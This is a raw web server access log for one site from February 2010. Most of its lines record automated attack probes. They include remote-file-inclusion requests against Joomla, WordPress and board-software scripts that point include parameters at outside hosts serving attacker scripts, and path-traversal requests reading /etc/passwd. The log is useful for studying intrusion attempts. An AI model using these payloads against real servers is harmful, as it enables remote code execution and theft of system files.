208.93.149.176 - - [08/Feb/2010:07:47:57 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:07:47:59 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:07:47:59 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:07:47:59 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:07:48:30 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:07:48:30 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:07:48:30 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:07:48:34 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:07:48:34 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:07:48:34 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:07:48:34 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 200 3642 "-" "libwww-perl/5.803" "www.puaga.com"
194.1.150.2 - - [08/Feb/2010:07:48:39 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [08/Feb/2010:07:48:39 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [08/Feb/2010:07:48:39 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:07:48:40 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:07:48:40 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:07:48:40 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:07:48:48 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:07:48:48 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:07:48:48 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:07:48:55 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:07:48:55 -0800] "GET /logs/access_100125.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:07:48:55 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [08/Feb/2010:07:50:12 -0800] "GET /logs/access_100104.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [08/Feb/2010:07:50:18 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [08/Feb/2010:07:50:18 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [08/Feb/2010:07:50:18 -0800] "GET /logs/access_100104.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:07:50:25 -0800] "GET /logs/access_100113.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:07:51:11 -0800] "GET /logs/access_100110.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:07:51:17 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:07:51:17 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:07:51:17 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:07:51:27 -0800] "GET /logs/access_100110.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [08/Feb/2010:07:52:13 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:07:52:30 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:07:52:30 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:07:52:30 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:52:50 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:52:50 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:52:50 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:52:53 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:52:53 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:52:53 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:07:52:56 -0800] "GET /logs/access.log//show_image_in_imgtag.php?mosConfig.absolute.path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:07:52:56 -0800] "GET /show_image_in_imgtag.php?mosConfig.absolute.path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:07:52:56 -0800] "GET /logs//show_image_in_imgtag.php?mosConfig.absolute.path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:07:52:59 -0800] "GET /logs/access_100127.log//show_image_in_imgtag.php?mosConfig.absolute.path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
143.248.176.79 - - [08/Feb/2010:07:53:02 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.176.79 - - [08/Feb/2010:07:53:02 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.176.79 - - [08/Feb/2010:07:53:02 -0800] "GET /logs/access_100104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:07:53:03 -0800] "GET /logs/access_100110.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.176.79 - - [08/Feb/2010:07:53:12 -0800] "GET /logs/access_100103.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:53:21 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:53:24 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:54:14 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:54:14 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:54:14 -0800] "GET /logs/access_100112.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:54:14 -0800] "GET /logs/access_100108.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [08/Feb/2010:07:54:20 -0800] "GET /logs/access_100110.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [08/Feb/2010:07:54:21 -0800] "GET /logs/access_100131.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:55:28 -0800] "GET /logs/access_100108.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:55:28 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:55:28 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.90.101.2 - - [08/Feb/2010:07:55:29 -0800] "GET /logs/access_100119.log/home.php?content=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
209.90.101.2 - - [08/Feb/2010:07:55:29 -0800] "GET /home.php?content=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
209.90.101.2 - - [08/Feb/2010:07:55:29 -0800] "GET /logs/home.php?content=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:55:37 -0800] "GET /logs/access.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:07:56:01 -0800] "GET /logs/access_100125.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:07:56:09 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:07:56:09 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:07:56:09 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:07:56:12 -0800] "GET /logs/access_100109.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:07:56:58 -0800] "GET /logs/access_100203.log%20%20//bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:07:56:58 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:07:56:59 -0800] "GET /bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [08/Feb/2010:07:57:07 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [08/Feb/2010:07:57:07 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [08/Feb/2010:07:57:26 -0800] "GET /logs/access_100111.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:57:35 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [08/Feb/2010:07:58:16 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [08/Feb/2010:07:58:16 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [08/Feb/2010:07:58:16 -0800] "GET /logs/access_100201.log//skin/zero_vote/ask_password.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:58:16 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:58:16 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:58:16 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [08/Feb/2010:07:58:16 -0800] "GET /logs/access_100103.log//skin/zero_vote/ask_password.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:58:17 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:58:17 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:58:17 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.176.79 - - [08/Feb/2010:07:58:19 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:07:58:28 -0800] "GET /logs/access_100110.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:07:58:31 -0800] "GET /write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:07:58:32 -0800] "GET /logs/access_100126.log//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:07:58:32 -0800] "GET /logs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.176.79 - - [08/Feb/2010:07:58:33 -0800] "GET /logs/access_100103.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:07:58:45 -0800] "GET /logs/access_100121.log%20%20//bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [08/Feb/2010:07:58:46 -0800] "GET /ideal/forum/viewtopic.php?p=20763 HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:07:58:57 -0800] "GET /logs/access_100125.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:59:07 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:59:17 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:07:59:35 -0800] "GET /logs/access_100113.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.138.32.230 - - [08/Feb/2010:08:00:12 -0800] "GET /logs/access_100123.log///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://igedermateryal.org/gelendosyalar/idxx.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.138.32.230 - - [08/Feb/2010:08:00:13 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://igedermateryal.org/gelendosyalar/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.138.32.230 - - [08/Feb/2010:08:00:13 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://igedermateryal.org/gelendosyalar/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:01:05 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:01:05 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:01:05 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
188.138.32.230 - - [08/Feb/2010:08:01:07 -0800] "GET /logs/access_100202.log///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://igedermateryal.org/gelendosyalar/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:01:16 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:01:16 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:01:16 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:01:19 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
